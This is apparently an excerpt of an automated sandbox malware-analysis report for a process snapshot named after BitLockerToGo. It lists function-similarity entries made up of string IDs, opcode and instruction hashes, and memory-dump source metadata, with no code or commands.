                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: #T$WW
                                                                                                                                                                                        • API String ID: 0-101372553
                                                                                                                                                                                        • Opcode ID: 1560de6b25e4ca0f6d4301de1c38ae748092c63c96c33a80cbde7f5ec4d72012
                                                                                                                                                                                        • Instruction ID: 85d8569f0707c6d26ad7fb811a2198b374dadc967cf69134860faa56ee94b9cc
                                                                                                                                                                                        • Opcode Fuzzy Hash: 1560de6b25e4ca0f6d4301de1c38ae748092c63c96c33a80cbde7f5ec4d72012
                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A91A1B5E003189FEB20DF68DD42B9DBB70EB46304F1481A9E548AB382D7358956CFD6
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 0$h
                                                                                                                                                                                        • API String ID: 0-1772827726
                                                                                                                                                                                        • Opcode ID: 0c2f226561208197253e35b0964b7b742a931cbbba1f0157d1618d4c7461fb69
                                                                                                                                                                                        • Instruction ID: 1a9ebc3e7b62b06804d38631d59773dcf2fb18181b8a24faf5c96181843b2949
                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c2f226561208197253e35b0964b7b742a931cbbba1f0157d1618d4c7461fb69
• Instruction Fuzzy Hash: CD6156B46093009FD710DF1AC440B6BBBE5EF99304F24982EE9D59B390C37AE845CB96
Strings
Memory Dump Source
• Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: 89$LKJi
• API String ID: 0-2183204925
• Opcode ID: 1ce7aeea86d95e81e9ea2b88f6bc55537f68257eaa4bf64c2722177d91bdb4d7
• Instruction ID: b142fb3b824a3b340488d91b7ebffeee8a72fe134906f958762fe520b23f27f5
• Opcode Fuzzy Hash: 1ce7aeea86d95e81e9ea2b88f6bc55537f68257eaa4bf64c2722177d91bdb4d7
• Instruction Fuzzy Hash: 654175366083908BC314CF15C88166BB7E2FFD5354F09899DF8C89B340DB789946CB8A
Strings
Memory Dump Source
• Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0123456789ABCDEFXP$@
• API String ID: 0-1121606115
• Opcode ID: b53557e47c368dcf51e7f1a69ba2f913baa4658b94177401d52740415c2ae4df
• Instruction ID: 46082c99e1110106a6d45bd01e5b7f7cbd20cedb8a94ec19ac618b55a40a23af
• Opcode Fuzzy Hash: b53557e47c368dcf51e7f1a69ba2f913baa4658b94177401d52740415c2ae4df
• Instruction Fuzzy Hash: D9313B715087418BD718CF19C0A436BFBE1AFC9364F189A2EA4E9673E1C7789904CB46
Strings
Memory Dump Source
• Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: InitializeThunk
• String ID: f
• API String ID: 2994545307-1993550816
• Opcode ID: 11fbd0d5cde49853ab6e9cdfca083b603a5a95dd2c271dfa384e43bdf826221d
• Instruction ID: 6649bbbb4bb15e33f2021c4374345cc7ffa4552ec515435c59a7015c32fb9775
• Opcode Fuzzy Hash: 11fbd0d5cde49853ab6e9cdfca083b603a5a95dd2c271dfa384e43bdf826221d
• Instruction Fuzzy Hash: 1022AE756093419FC714CF2AC880B2BBBE1ABC9314F189A2EF5958B3D1D738D845CB96
Strings
Memory Dump Source
• Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: %1.17g
• API String ID: 0-1551345525
• Opcode ID: b412980d213ed516da98ebabcffb5d932e68a46acf4e5109edfa1b3a243ae4c9
• Instruction ID: b49ac4134a64c9596f07efea1e0c8deec74fab226808be5a67872c9141ff0472
• Opcode Fuzzy Hash: b412980d213ed516da98ebabcffb5d932e68a46acf4e5109edfa1b3a243ae4c9
• Instruction Fuzzy Hash: 9A1217B1A08B418BE7158E58D48032BB7D2EFA1304F18857FD8956B3C1E7B9DC45CB4A
APIs
• CoCreateInstance.OLE32(00446B80,00000000,00000001,00446B70), ref: 00425DC9
Memory Dump Source
• Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: CreateInstance
• String ID:
• API String ID: 542301482-0
• Opcode ID: eea97a5192f1c9506813d76ef220e5770f7cb6113c417c8c8e06f39deaa1d0b1
• Instruction ID: 92c063b61ab353469d99c4d40c496fc7f9be6ac4a02dfe3d19263ec7b6681ee2
• Opcode Fuzzy Hash: eea97a5192f1c9506813d76ef220e5770f7cb6113c417c8c8e06f39deaa1d0b1
• Instruction Fuzzy Hash: 1151BDB1700720ABDB209B24EC86B7773A4EF86768F554519F985CB390F778E901C72A
Strings
Memory Dump Source
• Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: z!"#
• API String ID: 0-429687905
• Opcode ID: e7160bb7b78a8afe324cd61f144104c7576c357284f4f74add537356b84d2412
• Instruction ID: f1f19b6e5a11e21aa2845b1a198fc788c2a651f6f0f19f8cc094703b1917d0dc
• Opcode Fuzzy Hash: e7160bb7b78a8afe324cd61f144104c7576c357284f4f74add537356b84d2412
• Instruction Fuzzy Hash: 7AB101B1A143118BC724CF28D85136BB7F1FF95314F898A2EE8858B391E778D944C79A
Strings
Memory Dump Source
• Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: 2,D
• API String ID: 0-2418935499
• Opcode ID: ab2205d3d970be152914290462e2c9910ce5a979beb55d9b9a93c0818bbe57e4
• Instruction ID: 53c44a7cac65b914731dabd635d2c91a21c1277618180420b3d1f92b44a748f0
• Opcode Fuzzy Hash: ab2205d3d970be152914290462e2c9910ce5a979beb55d9b9a93c0818bbe57e4
• Instruction Fuzzy Hash: 9A81023671C3148FD308DF29D9A126BB7E2FB8A714F09893EE885D3391D678D9448B85
Strings
Memory Dump Source
• Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: ,
• API String ID: 0-3772416878
• Opcode ID: 26218c9c1370a7ddc9bb927c04509b3969731cb4df7de6fd365aeea0f5029a81
• Instruction ID: b3414554a80e2dbb62b390b87682af4b151155a3d2be20912d66614438ff3d60
• Opcode Fuzzy Hash: 26218c9c1370a7ddc9bb927c04509b3969731cb4df7de6fd365aeea0f5029a81
• Instruction Fuzzy Hash: B5B138711083819FC321CF18C88461BFBE0AFA9704F448E2EE5D997782D675E918CBA7
Strings
Memory Dump Source
• Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: @,
• API String ID: 0-608918562
• Opcode ID: 12d3153cb7bc255d7ca880b3807ee84f9480c9713f3ba18247162fb3f2338e07
• Instruction ID: 497425c06fc17601fc8cb0a2f005411f028e1bc110ed0ac542a95cd7aaedfb73
• Opcode Fuzzy Hash: 12d3153cb7bc255d7ca880b3807ee84f9480c9713f3ba18247162fb3f2338e07
• Instruction Fuzzy Hash: EF81E0716183558BD318DF29988179FBBE2EBC6700F05CD2DE5D59B384CB78990ACB82
Strings
• 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081, xrefs: 004352C0
Memory Dump Source
• Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081
• API String ID: 0-2471034898
• Opcode ID: 43417d1739509e3f7d8cd9af9bd2a62e8d22d5141dee40243128b75579a48c21
• Instruction ID: 5f4e21d9fa04d370fc1fc92a50827c2301553c401730d7fdbad26749d1448ab0
• Opcode Fuzzy Hash: 43417d1739509e3f7d8cd9af9bd2a62e8d22d5141dee40243128b75579a48c21
• Instruction Fuzzy Hash: 3761F937A1AD9047CB11593C4C013AA6B131BEB374F3E93ABD8B58B3D1C96E8903535A
Strings
Memory Dump Source
• Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: !
• API String ID: 0-2553554435
• Opcode ID: eb5080301330f4d5b3dec2c877bc2331a13b310edc5b9c61989d81b59761e2d6
• Instruction ID: 667df2aef690415bd6ffa681d8b2bbe36f9ff3277f3623b0d348b5ab8a7fa54c
• Opcode Fuzzy Hash: eb5080301330f4d5b3dec2c877bc2331a13b310edc5b9c61989d81b59761e2d6
                                                                                                                                                                                        • Instruction Fuzzy Hash: A831547361C3494BD3209FA8CD8535BBBD5ABD5204F1E893DE584D7352EAB8C9068781
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: <KJM
                                                                                                                                                                                        • API String ID: 0-3851247750
                                                                                                                                                                                        • Opcode ID: f8c954e7871009303307f08bc8d578476c4c0611dd961def60ed6fdaaff5a141
                                                                                                                                                                                        • Instruction ID: 27252ea4756a17c38d73e4e66724fd1e9db4a84f06acb749c7b4938b5406f34e
                                                                                                                                                                                        • Opcode Fuzzy Hash: f8c954e7871009303307f08bc8d578476c4c0611dd961def60ed6fdaaff5a141
                                                                                                                                                                                        • Instruction Fuzzy Hash: 0B31AFB4608301CBC7209F64D8A176BB7F0FF85358F00496DF1A68B3A1E7799801CB4A
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                        • API String ID: 2994545307-2766056989
                                                                                                                                                                                        • Opcode ID: a77470943a9c02e9c65dbe29d206042e794c5106e232cfb958642423b576ca4d
                                                                                                                                                                                        • Instruction ID: 9ec28875cd5e798081cc9b1fb1098287431769cc1de293d953d67822aa0ed750
                                                                                                                                                                                        • Opcode Fuzzy Hash: a77470943a9c02e9c65dbe29d206042e794c5106e232cfb958642423b576ca4d
                                                                                                                                                                                        • Instruction Fuzzy Hash: E231E3715083049FE310DF58C8C1B6BBBF4EB85314F14893EEA9897391D3799A488B6A
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Uninitialize
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3861434553-0
                                                                                                                                                                                        • Opcode ID: b3c8206b3a344f2c1ee8a2422b50c34a25ddd076cd78358c1f5963fb30513c6f
                                                                                                                                                                                        • Instruction ID: eda1d74cf79647e098188c3e02d50c6276112426ba03b045f3060ce80e6538fd
                                                                                                                                                                                        • Opcode Fuzzy Hash: b3c8206b3a344f2c1ee8a2422b50c34a25ddd076cd78358c1f5963fb30513c6f
                                                                                                                                                                                        • Instruction Fuzzy Hash: 800149F69182409BD7006F35BC120FBB7E0EB8231DF14857EE646D21A1E7358821924A
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 3cc0341b01a65ee5aa36ee29612d21f2a7bb69938064c905cc33e2943e9ef97e
                                                                                                                                                                                        • Instruction ID: a6b1b9560d85423246893116c1174cf4479b3d8257e7eae3421708c513230cd6
                                                                                                                                                                                        • Opcode Fuzzy Hash: 3cc0341b01a65ee5aa36ee29612d21f2a7bb69938064c905cc33e2943e9ef97e
                                                                                                                                                                                        • Instruction Fuzzy Hash: C262AB39204601CFD724CF28D85075ABBF2FF89314F198A6DE88687B91DB35E991CB94
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 97fb968541b031e80c3fe714d96f6fb09dfad10181e87cc40de9f467a72d3e72
                                                                                                                                                                                        • Instruction ID: 6038ecc6ab191d57e05e5c0b65a33849187978460077f5cd602bb7f9f81a3ed2
                                                                                                                                                                                        • Opcode Fuzzy Hash: 97fb968541b031e80c3fe714d96f6fb09dfad10181e87cc40de9f467a72d3e72
                                                                                                                                                                                        • Instruction Fuzzy Hash: F542D431518315CBC724DF18E8806ABB3E1FFD4314F298A3ED995A7385D738A951CB8A
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 0f23c809b7ad94ef6d963860c3a560882cf5d5cfb3045ba22b9eea2afe0b9053
                                                                                                                                                                                        • Instruction ID: 299dae1369da0c63fb3fa98c40d65d1eed2793e4933cc098ca48bfc92a84e6de
                                                                                                                                                                                        • Opcode Fuzzy Hash: 0f23c809b7ad94ef6d963860c3a560882cf5d5cfb3045ba22b9eea2afe0b9053
                                                                                                                                                                                        • Instruction Fuzzy Hash: A2528F70A087849FE7358B24C4847A7BBE1EB91314F14493EC5E616BC2C37DA989C79E
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: a0fcbbd3b9e49f22bcd552b99b501a40e0b07a2d02f9984baf02521e964c93dc
                                                                                                                                                                                        • Instruction ID: 1ee736a5611647d8b78130716cf6bb99b554f5e988d4690ceead0be568bd5f1b
                                                                                                                                                                                        • Opcode Fuzzy Hash: a0fcbbd3b9e49f22bcd552b99b501a40e0b07a2d02f9984baf02521e964c93dc
                                                                                                                                                                                        • Instruction Fuzzy Hash: DA52C67190C3458FCB15CF14C0906AABBE1BF85314F158A7EF89A6B381D779E845CB86
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 285106c434c0234a52e7ab74c4b50f650ae19940123bbbc214f401134c44a373
                                                                                                                                                                                        • Instruction ID: c51b75f3be66d6bc69e93bf52832389703b540c3940eaa209a253ba6dfcb9ec0
                                                                                                                                                                                        • Opcode Fuzzy Hash: 285106c434c0234a52e7ab74c4b50f650ae19940123bbbc214f401134c44a373
                                                                                                                                                                                        • Instruction Fuzzy Hash: 42422770A19B108FC378CF29C680526BBF1BF45710B644A2ED69797B90D33AF845CB5A
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 56a0380109bff15c8a662aa4a51e52c7f36c3c99f583ea2fe8aab385adb03c81
                                                                                                                                                                                        • Instruction ID: 7b68b14efb9e5f56e547ccd32000ce0052bca4a54416f3351253771368d991f2
                                                                                                                                                                                        • Opcode Fuzzy Hash: 56a0380109bff15c8a662aa4a51e52c7f36c3c99f583ea2fe8aab385adb03c81
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F02593AA08251CFD314CF38D88052AB7E2BF9A314F19867ED8A5CB392C735D945CB85
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        • Instruction ID: 15329c2cdc2addfc1820f306f771a7189f90b4c978d3834488c452e751b52ea4
                                                                                                                                                                                        • Opcode Fuzzy Hash: 4c684507e89593254484bbf19e0f038db5a11cb92a0f6b781d89425728a5ade7
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6A71FF746083208BC7148F25E89126BB7F2EFE6754F488A2DE4D55B391E3789902C78B
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 3e09f0728429eec1b8915a1a9d172bec702d6f936df9ce8a048c4ed1834d8ec1
                                                                                                                                                                                        • Instruction ID: b18341775a1ec020f0a166b4c7a2b5565affad59213a7dd6b023bc7c1d7d2692
                                                                                                                                                                                        • Opcode Fuzzy Hash: 3e09f0728429eec1b8915a1a9d172bec702d6f936df9ce8a048c4ed1834d8ec1
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9091077160C7418BD714DF3C894022BBBD29BCA324F298B2EE4E5973E6D679C845874B
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 76990fac503b4bfeae178dbdb162e7716ed69a155829da1cefcd6424eb856575
                                                                                                                                                                                        • Instruction ID: 5c1656a556ef2579ea079c2e71e44598901308f95b915a1ee4ba88947e51fdca
                                                                                                                                                                                        • Opcode Fuzzy Hash: 76990fac503b4bfeae178dbdb162e7716ed69a155829da1cefcd6424eb856575
                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E61EE746083118BC3209F25D8A176BBBF1EFC2764F489A1DF4D59B391E3789901CB9A
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: e7f0886e71c51a037be77bbe803af3701101e01c18405af914baea81eaf70866
                                                                                                                                                                                        • Instruction ID: a914b660a3e055a607b8e65222420a4c49ce7f67dede40f34d2522a3c32130e1
                                                                                                                                                                                        • Opcode Fuzzy Hash: e7f0886e71c51a037be77bbe803af3701101e01c18405af914baea81eaf70866
                                                                                                                                                                                        • Instruction Fuzzy Hash: 8D910A75604B808FC315CF38D8913A6BFE1AB9A314F19896DD5EBCB382D6399446CB11
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: f5b243fae0f8bf373573fd802f5910826aefc1ca9b4f11e97f5fbbf5e5da4c4d
                                                                                                                                                                                        • Instruction ID: 3f230e4cf3a7490c865bdbb72609187ba07b0a6b9b1bfd8d2a1ed225939444b4
                                                                                                                                                                                        • Opcode Fuzzy Hash: f5b243fae0f8bf373573fd802f5910826aefc1ca9b4f11e97f5fbbf5e5da4c4d
                                                                                                                                                                                        • Instruction Fuzzy Hash: FA619C75604B00CFD7388F29D85176BB7E2BB99314F118A3DE4AB87AA1DB34E445CB48
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 2b7e592b0d436d608c9b239a6abb55383d2af380d285bccb39998747d97ea939
                                                                                                                                                                                        • Instruction ID: 12b84ae3bd7a4e9105d6ac6501488a4cd802b926778ab41861a4117e37cdb6aa
                                                                                                                                                                                        • Opcode Fuzzy Hash: 2b7e592b0d436d608c9b239a6abb55383d2af380d285bccb39998747d97ea939
                                                                                                                                                                                        • Instruction Fuzzy Hash: 11513837A0959047DB189E3C5C112B9AA630BEB334F3E937BD8B59B3D5C52A8D03435A
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 84d3aae2d6339a71a846d6ed6450fe4ad1398a78898a92f22b5b61fe0340e378
                                                                                                                                                                                        • Instruction ID: f3e31dbd2123681d619c4937e3dfbb8938af2d17b466c5779291908e7a96e325
                                                                                                                                                                                        • Opcode Fuzzy Hash: 84d3aae2d6339a71a846d6ed6450fe4ad1398a78898a92f22b5b61fe0340e378
                                                                                                                                                                                        • Instruction Fuzzy Hash: 7551B976E106258BCB15CF6CD8906ADB7E2AFC8310B59826DD819AB385DB34AC11C7D4
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 883696312f7659cbf717281f956e5609cf3f283078f642d9b427e17a3555d2e0
                                                                                                                                                                                        • Instruction ID: 3febaa2971ac60a0832a273e0d02601136f1283f656963cd03d2697058b2fec3
                                                                                                                                                                                        • Opcode Fuzzy Hash: 883696312f7659cbf717281f956e5609cf3f283078f642d9b427e17a3555d2e0
                                                                                                                                                                                        • Instruction Fuzzy Hash: 99515EB25087549FE314DF29D49435BBBE1BBC8318F044E2EE4D987390E379DA088B86
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: e5edece35c1fcd9feea54095b4b5e969ab831b9077076869dd61b4390d696775
                                                                                                                                                                                        • Instruction ID: e5fa04d6ebca31e3f1bbf529f4b956f2bb6aa9f0ac85b88c12aebc6f2ff34523
                                                                                                                                                                                        • Opcode Fuzzy Hash: e5edece35c1fcd9feea54095b4b5e969ab831b9077076869dd61b4390d696775
